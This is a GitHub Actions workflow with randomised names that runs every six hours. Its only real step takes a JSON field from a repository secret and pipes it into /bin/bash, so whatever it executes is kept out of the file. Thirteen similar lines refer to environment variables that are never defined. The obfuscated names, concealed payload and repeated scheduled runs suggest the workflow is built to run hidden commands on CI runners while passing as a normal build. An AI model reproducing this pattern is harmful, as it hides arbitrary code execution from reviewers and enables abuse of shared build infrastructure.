name: zhouyiri2245
on:
  workflow_dispatch:
  schedule:
    - cron: '46 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhouyiri2245
        env:
          ikp30: ${{ secrets.ikp30 }}
        run: |
          echo $ikp30 | jq -r .flgmq02 | /bin/bash
          echo $scnfc6351 | jq -r .dcu9 | /bin/bash
          echo $hqf803 | jq -r .vlq9121 | /bin/bash
          echo $p752 | jq -r .xtsnt530 | /bin/bash
          echo $ri178 | jq -r .kbb626 | /bin/bash
          echo $di490 | jq -r .kijbr87 | /bin/bash
          echo $vakwd82 | jq -r .uoun190 | /bin/bash
          echo $dfvcl036 | jq -r .kcr425 | /bin/bash
          echo $dd2 | jq -r .vuoq654 | /bin/bash
          echo $t3 | jq -r .gbybx857 | /bin/bash
          echo $gg62 | jq -r .audz107 | /bin/bash
          echo $zh86578 | jq -r .klv83 | /bin/bash
          echo $x27852 | jq -r .igl0 | /bin/bash
          echo $ia97301 | jq -r .xygj90 | /bin/bash

